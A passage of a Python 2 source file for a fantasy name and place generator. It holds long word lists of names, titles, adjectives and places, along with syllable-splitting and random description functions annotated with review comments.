              "George", "Elias", "Majd", "Daniel", "Yusuf", "Ha", "Julian", "Charbel", "Jude", "Amir", "Adam", "Omri", "Eyal", "Amir", "Salman", "Rani", "Tamir", "Yosef", "Bahah", "Daniel", "Hiroto", "Ren", "Yuuma", "Mito", "Haruto", "Shota", "Yuuto",
              "Haruto", "Souma", "Sota", "Mohammad", "Ahmad", "Abdul", "Rahman", "Muhamad", "Ahmad", "Adam", "Aqil", "Aryan", "Yusuf", "Putera", "Mikhail", "Emir", "Ariff", "ranbaatar", "Batukhan", "Bataar", "Chuluun", "Sukhbataar", "Mohammad", "Ali",
              "Hussain", "Omar", "Bilal", "Usman", "Zahid", "Shahid", "Saqib", "Nomaan", "John", "Paul", "Justin", "Renz", "Clarence", "John", "Carl", "Kevin", "Richard", "Ezekiel", "Jared", "Xyriel", "Min-jun", "Ji-hu", "Ji-hoon", "Jun-seo", "Hyun-woo",
              "Ye-jun", "Kun-woo", "Hyun-jun", "Min-jae", "Woo-jin", "Chia-hao", "Chih-ming", "Chun-chieh", "Chien-hung", "Chun-hung", "Muhammad", "Yusuf", "Abdullo", "Abubakr", "Somchai", "Somsak", "Somporn", "Somboon", "Prasert", "Yusuf", "Mustafa",
              "Berat", "Emir", "Mehmet", "Ahmet", "Muhammed", "Enes", "A-mer", "Emirhan", "Mohammad", "Abdullah", "Ahmed", "Ali", "Khalid", "Saeed", "Omar", "Rashid", "Maryam", "Zhen", "Jing", "Ying", "Yan", "Li", "Xiaoyan", "Xinyi", "Jie", "Lili",
              "Xiaomei", "Tingting", "Saanvi", "Aanya", "Aadhya", "Aaradhya", "Anya", "Pari", "Anika", "Vya", "Angel", "Diya", "Anya", "Anika", "Aradhya", "Harini", "Avya", "Ridhi", "Rishika", "Sanvi", "Shreya", "Trisha", "Fatemeh", "Zahra", "Setayesh",
              "Hasti", "Zeib", "zanin-Zahra", "Reihaneh", "Maryam", "Mobi", "Fatemeh", "Zahra", "Maryam", "Ma'soumeh", "Sakineh", "Zeib", "Roghayyeh", "Khadije", "Leyla", "Somayyeh", "Noa", "Shira", "Tamar", "Talia", "Maya", "Yael", "Sarah", "Adele",
              "Ayala", "Michal", "Noam", "Amit", "Ariel", "Daniel", "Adi", "Ma'ayan", "Yuval", "Yahli", "Omer", "Lior", "Maryam", "Rahaf", "Leen", "Lian", "Rimas", "Hala", "Noor", "Bisan", "Malk", "Aya", "Maria", "Celine", "Aline", "Maya", "Noor",
              "Lian", "Maryam", "talie", "Tala", "Miral", "Eden", "Yarin", "Nur", "Sarah", "Sillin", "Assil", "Malk", "Maya", "Aya", "Miyar", "Yui", "Hi", "Aoi", "Yua", "Yui", "Rin", "Airi", "Koharu", "Airi", "Mei", "Rimas", "Ja", "Hala", "Nor",
              "Puteri", "Siti", "Aishah", "Sara", "Sophia", "Nurin", "Rania", "Hanh", "Khayla", "Odval", "Bolormaa", "Bayarmaa", "Oyunbileg", "Khongordzol", "Fatima", "Fozia", "Sadia", "Sobia", "dia", "Maryam", "Farza", "Ayesha", "Sakee", "Zaib",
              "Althea", "Jessa Mae", "Rhea Mae", "Mary Rose", "Kyla", "April Joy", "Jane", "Alexandra", "Precious", "Althea Mae", "Seo-yeon", "Min-seo", "Seo-hyeon", "Ji-woo", "Seo-yun", "Ji-min", "Su-bin", "Ha-eun", "Ye-eun", "Yun-seo", "Shu-fen",
              "Shu-hui", "Mei-ling", "Ya-ting", "Mei-hui", "Sumayah", "Asiya", "Oisha", "Googoosh", "Anohito", "Indira", "Zeynep", "Elif", "Ecrin", "Dave", "Aard")
#from wikipedia and some rpg class list
# Titles/honorifics for generated characters, grouped by source line:
# nobility, government, legal, clergy, military, RPG classes, and finally
# rank prefixes ("Arch" ... "Supreme").
# FIX: the original was missing a comma between "Brute" and "Arch", so
# Python's implicit adjacent-string-literal concatenation silently merged
# them into the single bogus entry "BruteArch", dropping both intended
# titles.  A comma has been added; all other entries are unchanged.
# NOTE(review): "Red Mage:" and "Blue Mage:" carry stray trailing colons
# and "Sheperd" looks like "Shepherd" — left as-is because existing
# generated content may depend on these exact strings; confirm before
# renaming.
properTitles = ("Emperor", "Empress", "King", "Queen", "Viceroy", "Vicereine", "Prince", "Princess", "Duke", "Duchess", "Count", "Countess", "Baron", "Baroness", "Pope", "Viscount", "Viscountess", "Earl", "Marquis", "Marquess", "Archon", "Tsar",
                "Tsarina", "Representative", "Senator", "Speaker", "President", "Councillor", "Alderman", "Delegate", "Mayor", "Mayoress", "Governor", "Governess", "Prefect", "Prelate", "Premier", "Burgess", "Ambassador", "Envoy", "Secretary",
                "Minister", "Attach", "Provost", "Advocate", "Attorney", "Bailiff", "Barrister", "Chancellor", "Judge", "Justice", "Magistrate", "Promagistrate", "Chairman", "Mufti", "Solicitor", "Lictor", "Reeve", "Seneschal", "Tribune",
                "Abbess", "Abbot", "Brother", "Sister", "Friar", "Mother", "Father", "Bishop", "Presbyter", "Priest", "Sheperd", "Patriarch", "Pope", "Catholicos", "Vicar", "Chaplain", "Canon", "Pastor", "Prelate", "Dom", "Cardinal", "Ter", "Coach",
                "Venerable", "Blessed", "Saint", "Messiah", "Deacon", "Archdeacon", "Acolyte", "Dean", "Elder", "Minister", "Monsignor", "Reader", "Almoner", "Colonel", "General", "Commodore", "Corporal", "Sergeant", "Admiral", "Brigadier",
                "Captain", "Commander", "General", "Officer", "Lieutenant", "Major", "Vicar", "Private", "Constable", "Agent", "Principal", "Comrade", "Dictator",
                "Fighter", "Barbarian", "Knight", "Swashbuckler", "Paladin", "Dark Knight", "Dragon Knight", "Samurai", "Warlord", "Hero", "Magician", "Inherent Gift Magician", "Theurgist Magician", "Summoner Magician", "Vancian Magician",
                "Red Mage:", "Blue Mage:", "Necromantic Magician", "Illusionist Magician", "Nature Magician", "Elemental Magician", "Druid Magician", "Shamanic Magician", "Elemental Magician", "Rogue", "Thief", "Assassin", "Gambler", "Ninja",
                "Shadow", "Pirate", "Scout", "Cleric", "Priest", "Battle Priest", "Witch Doctor", "Templar", "Caster", "Ranger", "Sniper Ranger", "Bow and Blade Ranger", "Beastmaster Ranger", "Dual Wielding Ranger", "Trapper Ranger",
                "Magical Ranger", "Magic Knight", "Bard", "Dancer", "Monk", "Engineer", "Alchemist", "Psychic", "Gunslinger", "Brute",
                "Arch", "Grand", "Prime", "Head", "Lord", "Chief", "Superior", "High", "Supreme")
# Adjective list sourced from myvocabulary.com.
# Adjective pool used by name()/name_assist() — indexed by position, so the
# ordering matters to RNG-driven lookups. NOTE(review): several entries are
# duplicated ("Anxious", "Guilty", "Intense", ...), which doubles their
# selection weight — confirm whether that is intentional before deduplicating.
adjectives = ("Able", "Abundant", "Accepting", "Accommodating", "Active", "Addictive", "Adequate", "Aggressive", "Amazing", "Amiable", "Amicable", "Amusing", "Antagonistic", "Anxious", "Anxious", "Apathetic", "Aquatic", "Arrogant", "Articulate",
"Artistic", "Attentive", "Attractive", "Authoritative", "Awesome", "Barren", "Benevolent", "Biodegradable", "Blase", "Bold", "Bonding", "Boorish", "Bountiful", "Braggart", "Brave", "Brilliant", "Buoyant", "Busy", "Buzzing", "Callow",
"Captious", "Caring", "Celestial", "Charming", "Chaste", "Cheating", "Cheerful", "Churlish", "Civil", "Clean", "Clever", "Cold", "Colossal", "Combustible", "Comfortable", "Commercial", "Communicative", "Compact", "Competitive",
"Compulsive", "Confident", "Conflicted", "Congenial", "Conscientious", "Conservative", "Considerate", "Conspicuous", "Contemptible", "Contiguous", "Cooperative", "Cordial", "Courageous", "Courteous", "Covetous", "Creative", "Critical",
"Critical", "Crucial", "Crude", "Curious", "Current", "Curt", "Cynical", "Decent", "Decorous", "Defensive", "Deferential", "Deft", "Dejected", "Delightful", "Demeaning", "Demise", "Dependable", "Deplorable", "Depressed",
"Destructive", "Devious", "Devoted", "Dictatorial", "Diligent", "Diminutive", "Diplomatic", "Discreet", "Disdainful", "Dishonesty", "Dishonorable", "Disposable", "Disrespectful", "Distracted", "Docile", "Downcast", "Dynamic", "Dynamic",
"Earnest", "Earthy", "Ecological", "Efficient", "Egotistical", "Electrifying", "Elitist", "Empathetic", "Endangered", "Endemic", "Energetic", "Enigmatic", "Enthusiastic", "Esteemed", "Estimable", "Ethical", "Euphoric", "Evergreen",
"Exclusive", "Expectant", "Explosive", "Exquisite", "Extravagant", "Extrovert", "Exuberant", "Fair", "Faithful", "Fallow", "Falseness", "Famous", "Fancy", "Ferocious", "Fertile", "Fervent", "Fervid", "Fibrous", "Fierce", "Flexible",
"Focused", "Forgiving", "Forlorn", "Frail", "Generous", "Genial", "Genteel", "Gentle", "Genuine", "Gifted", "Gigantic", "Glib", "Gloomy", "Good", "Gorgeous", "Grace", "Gracious", "Grand", "Grateful", "Grabby", "Grouchy",
"Guilty", "Guilty", "Gusty", "Happy", "Hard-hearted", "Healing", "Heedless", "Helpfulness", "Heroic", "Honest", "Honorable", "Hopeful", "Hostile", "Humane", "Humble", "Humorous", "Hygienic", "Hysterical", "Idealistic", "Idolize",
"Ignoble", "Ignorant", "Ill-tempered", "Impartial", "Impolite", "Improper", "Imprudent", "Impudent", "Indecent", "Indecorous", "Indifference", "Indigenous", "Industrious", "Ingenuous", "Innocent", "Innovative", "Insightful", "Insolent",
"Inspirational", "Instructive", "Insulting", "Intense", "Intense", "Intense", "Intolerant", "Introvert", "Intuitive", "Inventive", "Investigative", "Irresponsible", "Jaundiced", "Jealous", "Jealous", "Jocular", "Jolly",
"Jovial", "Joyful", "Jubilant", "Just", "Juvenile", "Keen", "Kind", "Kindred", "Knowledgeable", "Liberal", "Listener", "Loathsome", "Loving", "Loyal", "Magical", "Magnificent", "Malevolent", "Malicious", "Mammoth",
"Manipulative", "Marine", "Mastery", "Meddling", "Meritorious", "Meticulous", "Migratory", "Minuscule", "Miserable", "Mistrustful", "Modest", "Moral", "Mysterious", "Naive", "Nascent", "Native", "Natural", "Natural", "Nature", "Needy",
"Nefarious", "Negative", "Neglected", "Neglectful", "Negligent", "Nice", "Noble", "Notorious", "Obedient", "Observant", "Open", "Open-minded", "Opinionated", "Oppressive", "Orderly", "Oriented", "Original", "Outrageous", "Outspoken",
"Parasitic", "Partial", "Passionate", "Patient", "Perceptive", "Personable", "Personal", "Petulant", "Pleasant", "Poise", "Polite", "Pollutant", "Popular", "Popular", "Powerful", "Prejudicial", "Preposterous", "Pretentious", "Prideful",
"Principled", "Pristine", "Prompt", "Proper", "Punctual", "Purposeful", "Quaint", "Quarrelsome", "Quick", "Quiet", "Quiet", "Quirky", "Radioactive", "Rancorous", "Rational", "Reasonable", "Reckless", "Refined", "Reflective", "Reliant",
"Remarkable", "Remorseful", "Repugnant", "Resilient", "Resilient", "Resolute", "Resourceful", "Respectful", "Responsible", "Responsive", "Restorative", "Reverent", "Rotting", "Rude", "Ruthless", "Sad",
"Safe", "Scornful", "Scrumptious", "Selfish", "Sensible", "Sensitive", "Simple", "Sober", "Solar", "Solemn", "Solitary", "Sour", "Spatial", "Special", "Splendid", "Splendid", "Staunch", "Staunch", "Stern", "Stunning",
"Successful", "Sullen", "Superb", "Superior", "Supportive", "Surly", "Suspicious", "Sweet", "Sympathetic", "Tactful", "Taint", "Temperate", "Temperate", "Tenacious", "Terrific", "Testy", "Thoughtful", "Thoughtless", "Tolerant", "Towering",
"Toxic", "Treacherous", "Tropical", "Trustworthy", "Truthful", "Ultimate", "Ultimate", "Uncivil", "Uncouth", "Undeveloped", "Unethical", "Unfair", "Unique", "Unique", "Unmannerly", "Unrefined", "Unsavory", "Unworthy",
"Uplifting", "Upright", "Uproot", "Upstanding", "Valiant", "Veracious", "Versatile", "Vicious", "Vigilant", "Vigilant", "Vigorous", "Vile", "Villainous", "Virtuous", "Visible", "Visible", "Vivacious", "Vocal", "Volatile", "Volunteering",
"Vulnerable", "Warm", "Wary", "Waspish", "Watchful", "Welcoming", "Wicked", "Wild", "Willing", "Winning", "Winsome", "Wise", "Wishy-washy", "Wistful", "Witty", "Woeful", "Wonderful", "Worried", "Worthwhile", "Worthy")
# Subordinate titles used by name_assist() when describing a character's followers.
lesser = ("Assistant", "Aide", "Lieutenant", "Sergent", "Hand", "Envoy", "Chosen", "Protege", "Helper", "Attendant", "Squire", "Page", "Trainee", "Padawan", "Vice")
# Country and city names sourced from Wikipedia; split_by_syllable() later
# chops them into the syllable pool used by area_name().
# Raw word pool for syllable extraction: country names (multi-word names
# deliberately pre-split into single words), then US cities, European cities,
# and a few fantasy place names. Fixes over the previous revision: a missing
# comma after the second "Transnistria" concatenated it with "New York" into
# "TransnistriaNew York"; the "Port St. Lucie" literal was broken across two
# physical lines; "Mcalaga" (garbled encoding of Malaga) corrected.
countryNames = ["Abkhazia", "Afghanistan", "Albania", "Algeria", "Andorra", "Angola", "Antigua", "and", "Barbuda", "Argentina", "Armenia", "Australia", "Austria", "Azerbaijan", "Bahamas,", "The", "Bahrain", "Bangladesh", "Barbados", "Belarus", "Belgium",
"Belize", "Benin", "Bhutan", "Bolivia", "Bosnia", "and", "Herzegovina", "Botswana", "Brazil", "Brunei", "Bulgaria", "Burkina", "Faso", "Burma", "Burundi", "Cambodia", "Cameroon", "Canada", "Cape", "Verde", "Central", "African", "Republic", "Chad",
"Chile", "China", "Taiwan", "Colombia", "Comoros", "Congo,", "Democratic", "Republic", "of", "the", "Congo,", "Republic", "of", "the", "Cook", "Islands", "Costa", "Rica", "Ivory", "Coast", "Croatia", "Cuba", "Cyprus", "Czech", "Republic", "Korea,",
"North", "Congo,", "Democratic", "Republic", "of", "the", "Denmark", "Djibouti", "Dominica", "Dominican", "Republic", "East", "Timor", "Ecuador", "Egypt", "El", "Salvador", "Equatorial", "Guinea", "Eritrea", "Estonia", "Ethiopia", "Fiji", "Finland",
"France", "Gabon", "Gambia,", "The", "Georgia", "Germany", "Ghana", "Greece", "Grenada", "Guatemala", "Guinea", "Guinea-Bissau", "Guyana", "Haiti", "Vatican", "City", "Honduras", "Hungary", "Iceland", "India", "Indonesia", "Iran", "Iraq", "Ireland",
"Israel", "Italy", "Ivory", "Coast", "Jamaica", "Japan", "Jordan", "Kazakhstan", "Kenya", "Kiribati", "Korea,", "North", "Korea,", "South", "Kosovo", "Kuwait", "Kyrgyzstan", "Laos", "Latvia", "Lebanon", "Lesotho", "Liberia", "Libya", "Liechtenstein",
"Lithuania", "Luxembourg", "Macedonia", "Madagascar", "Malawi", "Malaysia", "Maldives", "Mali", "Malta", "Marshall", "Islands", "Mauritania", "Mauritius", "Mexico", "Micronesia,", "Federated", "States", "of", "Moldova", "Monaco", "Mongolia", "Montenegro",
"Morocco", "Mozambique", "Burma", "Nagorno-Karabakh", "Namibia", "Nauru", "Nepal", "Netherlands", "New", "Zealand", "Nicaragua", "Niger", "Nigeria", "Niue", "Northern", "Cyprus", "Korea,", "North", "Norway", "Oman", "Pakistan", "Palau", "Palestine",
"Panama", "Papua", "New", "Guinea", "Paraguay", "Peru", "Philippines", "Poland", "Portugal", "Transnistria", "Qatar", "Korea,", "South", "Congo,", "Republic", "of", "the", "Romania", "Russia", "Rwanda", "Sahrawi", "Arab", "Democratic", "Republic", "Saint",
"Kitts", "and", "Nevis", "Saint", "Lucia", "Saint", "Vincent", "and", "the", "Grenadines", "Samoa", "San", "Marino", "Sao", "Tome", "and", "Principe", "Saudi", "Arabia", "Senegal", "Serbia", "Seychelles", "Sierra", "Leone", "Singapore", "Slovakia",
"Slovenia", "Solomon", "Islands", "Somalia", "Somaliland", "South", "Africa", "Korea,", "South", "South", "Ossetia", "South", "Sudan", "Spain", "Sri", "Lanka", "Sudan", "South", "Sudan", "Suriname", "Swaziland", "Sweden", "Switzerland", "Syria",
"Taiwan", "Tajikistan", "Tanzania", "Thailand", "East", "Timor", "Togo", "Tonga", "Transnistria", "Trinidad", "and", "Tobago", "Tunisia", "Turkey", "Turkmenistan", "Tuvalu", "Uganda", "Ukraine", "United", "Arab", "Emirates", "United", "Kingdom",
"United", "States", "Uruguay", "Uzbekistan", "Vanuatu", "Vatican", "City", "Venezuela", "Vietnam", "Yemen", "Zambia", "Zimbabwe", "Abkhazia", "Cook", "Islands", "Kosovo", "Niue", "Northern", "Cyprus", "Sahrawi", "Arab", "Democratic", "Republic",
"Somaliland", "South", "South", "North", "East", "West", "Ossetia", "Taiwan", "Transnistria",
# US cities
"New York", "Los Angeles", "Chicago", "Houston", "Philadelphia", "Phoenix", "San Antonio", "San Diego", "Dallas", "San Jose", "Austin", "Jacksonville", "Indianapolis", "San Francisco", "Columbus", "Fort Worth", "Charlotte", "Detroit", "El Paso",
"Memphis", "Boston", "Seattle", "Denver", "Washington", "Nashville", "Baltimore", "Louisville", "Portland", "Oklahoma City", "Milwaukee", "Las Vegas", "Albuquerque", "Tucson", "Fresno", "Sacramento", "Long Beach", "Kansas City", "Mesa",
"Virginia Beach", "Atlanta", "Colorado Springs", "Raleigh", "Omaha", "Miami", "Oakland", "Tulsa", "Minneapolis", "Cleveland", "Wichita", "Arlington", "New Orleans", "Bakersfield", "Tampa", "Honolulu", "Anaheim", "Aurora", "Santa Ana",
"St. Louis", "Riverside", "Corpus Christi", "Pittsburgh", "Lexington", "Anchorage", "Stockton", "Cincinnati", "Saint Paul", "Toledo", "Newark", "Greensboro", "Plano", "Henderson", "Lincoln", "Buffalo", "Fort Wayne", "Jersey City",
"Chula Vista", "Orlando", "St. Petersburg", "Norfolk", "Chandler", "Laredo", "Madison", "Durham", "Lubbock", "Winston–Salem", "Garland", "Glendale", "Hialeah", "Reno", "Baton Rouge", "Irvine", "Chesapeake", "Irving", "Scottsdale",
"North Las Vegas", "Fremont", "Gilbert", "San Bernardino", "Boise", "Birmingham", "Rochester", "Richmond", "Spokane", "Des Moines", "Montgomery", "Modesto", "Fayetteville", "Tacoma", "Shreveport", "Fontana", "Oxnard", "Aurora",
"Moreno Valley", "Akron", "Yonkers", "Columbus", "Augusta", "Little Rock", "Amarillo", "Mobile", "Huntington Beach", "Glendale", "Grand Rapids", "Salt Lake City", "Tallahassee", "Huntsville", "Worcester", "Knoxville", "Grand Prairie",
"Newport News", "Brownsville", "Santa Clarita", "Overland Park", "Providence", "Jackson", "Garden Grove", "Oceanside", "Chattanooga", "Fort Lauderdale", "Rancho Cucamonga", "Santa Rosa", "Port St. Lucie",
"Ontario", "Tempe", "Vancouver", "Springfield", "Cape Coral", "Pembroke Pines", "Sioux Falls", "Peoria", "Lancaster", "Elk Grove", "Corona", "Eugene", "Salem", "Palmdale", "Salinas", "Springfield", "Pasadena", "Rockford", "Pomona",
"Hayward", "Fort Collins", "Joliet", "Escondido", "Kansas City", "Torrance", "Bridgeport", "Alexandria", "Sunnyvale", "Cary", "Lakewood", "Hollywood", "Paterson", "Syracuse", "Naperville", "McKinney", "Mesquite", "Clarksville",
"Savannah", "Dayton", "Orange", "Fullerton", "Pasadena", "Hampton", "McAllen", "Killeen", "Warren", "West Valley City", "Columbia", "New Haven", "Sterling Heights", "Olathe", "Miramar", "Thousand Oaks", "Frisco", "Cedar Rapids",
"Topeka", "Visalia", "Waco", "Elizabeth", "Bellevue", "Gainesville", "Simi Valley", "Charleston", "Carrollton", "Coral Springs", "Stamford", "Hartford", "Concord", "Roseville", "Thornton", "Kent", "Lafayette", "Surprise", "Denton",
"Victorville", "Evansville", "Midland", "Santa Clara", "Athens", "Allentown", "Abilene", "Beaumont", "Vallejo", "Independence", "Springfield", "Ann Arbor", "Provo", "Peoria", "Norman", "Berkeley", "El Monte", "Murfreesboro",
"Lansing", "Columbia", "Downey", "Costa Mesa", "Inglewood", "Miami Gardens", "Manchester", "Elgin", "Wilmington", "Waterbury", "Fargo", "Arvada", "Carlsbad", "Westminster", "Rochester", "Gresham", "Clearwater", "Lowell",
"West Jordan", "Pueblo", "San Buenaventura (Ventura)", "Fairfield", "West Covina", "Billings", "Murrieta", "High Point",
"Round Rock", "Richmond", "Cambridge", "Norwalk", "Odessa", "Antioch", "Temecula", "Green Bay", "Everett", "Wichita Falls", "Burbank", "Palm Bay", "Centennial", "Daly City", "Richardson", "Pompano Beach", "Broken Arrow",
"North Charleston", "West Palm Beach", "Boulder", "Rialto", "Santa Maria", "El Cajon", "Davenport", "Erie", "Las Cruces", "South Bend", "Flint", "Kenosha",
# European cities
"London", "Berlin", "Madrid", "Rome", "Paris", "Bucharest", "Vienna", "Hamburg", "Budapest", "Warsaw", "Barcelona", "Milan", "Munich", "Prague", "Sofia", "Brussels", "Birmingham", "Cologne", "Naples", "Turin", "Stockholm",
"Marseille", "Amsterdam", "Valencia", "Zagreb", "Krakow", "Leeds", "Lodz", "Seville", "Frankfurt", "Zaragoza", "Riga", "Athens", "Palermo", "Wroclaw", "Rotterdam", "Genoa", "Helsinki", "Stuttgart", "Glasgow", "Dusseldorf",
"Dortmund", "Malaga", "Essen", "Copenhagen", "Sheffield", "Poznan", "Lisbon", "Bremen", "Vilnius", "Gothenburg", "Dresden", "Dublin", "Bradford", "Leipzig", "Antwerp", "Manchester", "Hannover", "The_Hague", "Edinburgh",
"Nuremberg", "Duisburg", "Lyon", "Liverpool", "Gdansk", "Toulouse", "Murcia", "Bristol", "Tallinn", "Bratislava", "Szczecin", "Palma de Mallorca", "Bologna", "Las Palmas de Gran Canaria", "Florence", "Brno", "Bydgoszcz",
"Bochum", "Bilbao", "Cardiff", "Lublin", "Nice", "Wuppertal", "Plovdiv", "Varna", "Alicante", "Leicester", "Córdoba", "Bielefeld", "City of Wakefield", "Thessaloniki", "Utrecht", "Metropolitan Borough of Wirral", "Aarhus",
"Bari", "Coventry", "Valladolid", "Bonn", "Cluj", "Napoca", "Malmö", "Nottingham", "Katowice", "Kaunas", "Timisoara",
# fantasy
"San", "Pan", "Narnia", "Moria", "Shire", "Tamriel"]
countrySylables = []  # populated by newMain() via split_by_syllable(countryNames)
# Biome and structure nouns adapted from Minecraft, plus original additions.
# Location nouns combined with areaAdj by descriptive_area().
# Fixes over the previous revision: "Monastary" -> "Monastery",
# "Cathedrel" -> "Cathedral" (misspellings appeared verbatim in output).
areaBiome = ["Taiga", "Plain", "River", "Beach", "Hill", "Mountain", "Island", "Cliff", "Headland", "Moor", "Highland", "Desert", "Forest", "Jungle", "Swamp", "Savannah", "Mesa", "Plateau", "Ocean", "Wasteland", "Valley", "Chasm", "Abyss", "Waterfall",
             "Town", "Village", "City", "Alley", "Slum", "Homestead", "Cabin", "Camp", "Road", "Highway", "Tower", "Citadel", "Compound", "Complex", "Keep", "Dungeon", "Castle", "Crypt", "Cellar", "Tomb", "Ruin", "Fortress",
             "Great Hall", "Town Center", "Monastery", "Church", "Cathedral", "Temple", "Coast", "Port"]
# Area adjectives adapted from Minecraft, plus original additions.
# Adjectives prefixed to areaBiome entries by descriptive_area().
# Fix: "Courrupted" -> "Corrupted". "Slimey" kept as-is — possibly a
# deliberate whimsical spelling; confirm before changing.
areaAdj = ["Snowy", "Frozen", "Cold", "Flamed", "Hot", "Rainy", "Stormy", "Mega", "Great", "Holy", "Unholy", "Spruce", "Stone", "Deep", "Foul", "Withered", "Corrupted", "Dark", "Bright", "Stunning", "Sunken", "Watery", "Slimey", "Oozing"]
def flatten(l, limit=1000, counter=0):
    """Flatten nested lists/tuples contained in `l`, in place.

    Parameters:
        l: list to flatten; it is mutated and also returned.
        limit: maximum number of sub-sequence expansions — a guard
            against pathological nesting.
        counter: expansions already performed (kept for interface
            compatibility with the old recursive implementation).

    Returns the same list object, fully flattened (up to `limit`).

    Fixes a bug in the previous version: popping a sub-list and
    re-inserting its elements one at a time at the same index reversed
    their order (e.g. [[1, 2], 3] became [2, 1, 3]). Slice assignment
    splices the sub-sequence in while preserving order, and the
    iterative loop avoids re-scanning from the start on every expansion.
    """
    i = 0
    while i < len(l):
        if isinstance(l[i], (list, tuple)) and counter < limit:
            # Splice the nested sequence in place; do not advance i so
            # that freshly exposed nested sequences are expanded too.
            l[i:i + 1] = list(l[i])
            counter += 1
        else:
            i += 1
    return l
def break_string(string, letterType):
    """Recursively split `string` into syllable-like chunks.

    `letterType` is `string` with every vowel replaced by "V" and every
    consonant by "C" (built by split_by_syllable). A split is made one
    character after the start of a pattern that typically marks a
    syllable boundary ("VCC", "CVC", "VVC", "CCC").

    Returns the string itself when it is short (< 6 chars) or no split
    point is found; otherwise a nested list of fragments — callers are
    expected to flatten the result.
    """
    # Short strings count as a single syllable.
    if(len(string)<6):
        return string
    listSyla = []
    # First occurrence of each candidate boundary pattern.
    listOfIndecies= [letterType.find("VCC"),letterType.find("CVC"),letterType.find("VVC"),letterType.find("CCC")]
    # If a pattern starts too close to the beginning (index < 3, which
    # also covers "not found" == -1), search again past the first two
    # characters so the left fragment keeps a minimum length.
    if(listOfIndecies[0] < 3 ):
        listOfIndecies[0] = letterType[2:].find("VCC")+2
    if(listOfIndecies[1] < 3 ):
        listOfIndecies[1] = letterType[2:].find("CVC")+2
    if(listOfIndecies[2] < 3 ):
        listOfIndecies[2] = letterType[2:].find("VVC")+2
    if(listOfIndecies[3] < 3 ):
        listOfIndecies[3] = letterType[2:].find("CCC")+2
    # NOTE(review): every usable index appends its own pair of splits,
    # so a word matching several patterns contributes overlapping
    # fragments more than once — confirm whether a `break` after the
    # first successful split was intended.
    for i in listOfIndecies:
        if(i > 1 and i + 2 < len(string)):
            listSyla.append(break_string(string[:i+1],letterType[:i+1]))
            listSyla.append(break_string(string[i+1:],letterType[i+1:]))
    if(listSyla == []):
        return string
    return listSyla
def split_by_syllable(stringList=("")):
    """Break every word in `stringList` into syllable-like chunks.

    Each entry is split on whitespace and en-dashes, lower-cased, and
    stripped of punctuation/digits; each resulting word is mapped to a
    vowel/consonant "V"/"C" pattern, which break_string uses to cut it
    into syllables. Returns one flat list of syllable strings.
    """
    words = []
    for entry in stringList:
        for token in entry.split():
            for piece in token.split("–"):
                # Python 2 str.translate with a None table deletes the
                # listed characters.
                words.append(piece.lower().translate(None,',.-_%0123456789'))
    vowel = ['a','e','i','o','u','y']
    const = ['q','w','r','t','p','s','d','f','g','h','j','k','l','z','x','c','v','b','n','m']
    listSyla = []
    for word in words:
        # Build the V/C pattern for this word, then split it.
        pattern = word
        for v in vowel:
            pattern = pattern.replace(v,"V")
        for c in const:
            pattern = pattern.replace(c,"C")
        listSyla.append(break_string(word, pattern))
    return flatten(listSyla)
def item():
    """Compose a random item description: effect, quality, material, type."""
    def pick(options):
        return options[random.randint(0, len(options) - 1)]
    return " ".join([pick(itemEffect), pick(qualityType), pick(materialType), pick(itemType)])
def name_assist(titleVar, title, adj, name):
    """Describe one follower of the character called `name`.

    `title` and `adj` are the leader's indices into properTitles and
    adjectives; the follower gets a nearby (offset) title or adjective.
    Returns a single formatted line.
    """
    def pick(options):
        return options[random.randint(0, len(options) - 1)]

    if random.random() < 0.3:
        # Related title: offset the leader's title index; half the time
        # negate it so it wraps around from the end of properTitles.
        shifted = title + random.randint(1, titleVar)
        if random.random() < 0.5:
            shifted = -shifted
        return "%s's %s %s, %s" % (name, pick(lesser), properTitles[shifted], pick(firstNames))
    # Otherwise nudge the adjective index up or down and use a lesser rank.
    if random.random() < 0.5:
        adj += random.randint(1, 5)
    else:
        adj -= random.randint(1, 5)
    return "%s's %s %s, %s" % (name, adjectives[adj], pick(lesser), pick(firstNames))
def name():
    """Generate a multi-line blurb: a titled leader plus two followers."""
    # Keep the indices away from both ends of the pools so name_assist
    # can offset them without running out of range.
    titleVar = 4
    title = random.randint(titleVar, len(properTitles) - 1 - titleVar)
    adj = random.randint(5, len(adjectives) - 6)
    leader = firstNames[random.randint(0, len(firstNames) - 1)]
    string = leader + " the " + adjectives[adj] + " " + properTitles[title]
    # Two follower lines, each referencing the leader's first name.
    string += "\n    " + name_assist(titleVar, title, adj, string.partition(' ')[0])
    string += "\n    " + name_assist(titleVar, title, adj, string.partition(' ')[0])
    string += "\n"
    return string
def area_name(length=4, startingLetter=None):
    """Generate a pronounceable place name of at least `length` letters.

    Random syllables from the global countrySylables pool are
    concatenated, then the candidate is screened against letter-pattern
    rules; on any failure the function recurses and tries again.

    `startingLetter` is accepted but currently unused — TODO: implement
    or drop.
    """
    def syl():
        # One random, lower-cased syllable from the global pool.
        return countrySylables[random.randint(0,len(countrySylables)-1)].lower()
    name = syl()
    while(len(name)<length):
        name += syl()
    # Build the vowel/consonant "V"/"C" pattern of the candidate name.
    vowel = ['a','e','i','o','u','y']
    const = ['q','w','r','t','p','s','d','f','g','h','j','k','l','z','x','c','v','b','n','m']
    typeString = name
    for v in vowel:
        typeString = typeString.replace(v,"V")
    for c in const:
        typeString = typeString.replace(c,"C")
    #early failure
    #optional 2-character bad combos: "rc","rs","rk","nd","tb","nb","mb","pz","rl","rf","lt","ld","nt","mh","gf",
    # Reject names containing hard-to-pronounce trigrams.
    badCombos = ["pmb","ngf","fkt","crm","vns","vms"]
    for c in badCombos:
        if(name.find(c) >= 0):
            return area_name(length)
    # Reject: 4+ consonants in a row, consonant/vowel ratio out of
    # bounds, or a doubled first letter.
    if(typeString.find("CCCC") >= 0 or typeString.count("C") > typeString.count("V")*4 or typeString.count("C") <= typeString.count("V") or name[0] == name[1]):
        return area_name(length)
    # Trim a leading consonant cluster down to a single consonant.
    if(typeString[:3]=="CCC"):
        typeString = typeString[2:]
        name = name[2:]
    if(typeString[:2]=="CC"):
        typeString = typeString[1:]
        name = name[1:]
    # Trimming may have made the name too short; retry if so.
    if(len(name)<length):
        return area_name(length)
    return name.title()
def descriptive_area(length=6):
    """Build a place description like 'Frozen Valley of Sorvia'."""
    adj = areaAdj[random.randint(0, len(areaAdj) - 1)]
    biome = areaBiome[random.randint(0, len(areaBiome) - 1)]
    return "%s %s of %s" % (adj, biome, area_name(length))
#do not call, is broken
def drawMain():
    """Experimental shape-drawing stub — still NOT wired up or called.

    Fixes over the previous revision:
